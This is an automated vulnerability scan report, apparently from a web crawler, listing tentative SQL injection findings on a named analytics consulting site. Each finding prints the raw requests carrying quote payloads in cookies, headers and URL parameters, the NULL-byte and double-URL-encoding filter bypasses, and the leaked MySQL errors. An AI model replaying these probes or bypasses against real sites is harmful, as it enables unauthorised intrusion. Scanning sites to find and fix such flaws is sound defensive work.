Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:57:11 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:57:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39325


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.26. http://www.analyticspros.com/blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:57:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:57:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.27. http://www.analyticspros.com/blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:37:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:37:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:37:04 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:37:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26022


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.28. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/60-ga-extended-segments-part-1.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics'/60-ga-extended-segments-part-1.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:19:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics''/60-ga-extended-segments-part-1.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:19:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:19:59 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:19:59 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.29. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html [__utmmobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/60-ga-extended-segments-part-1.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:14:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527%2527;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:14:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:14:22 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:14:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.30. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html [optimizelyEndUserId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/60-ga-extended-segments-part-1.html

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the optimizelyEndUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:03:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:03:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.31. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937'; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:11:48 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937''; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:11:48 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:11:49 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:11:50 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35356


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.32. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:00:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:00:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.33. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html [itemid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html

Issue detail

The itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the itemid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html?itemid=70#comment%00' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
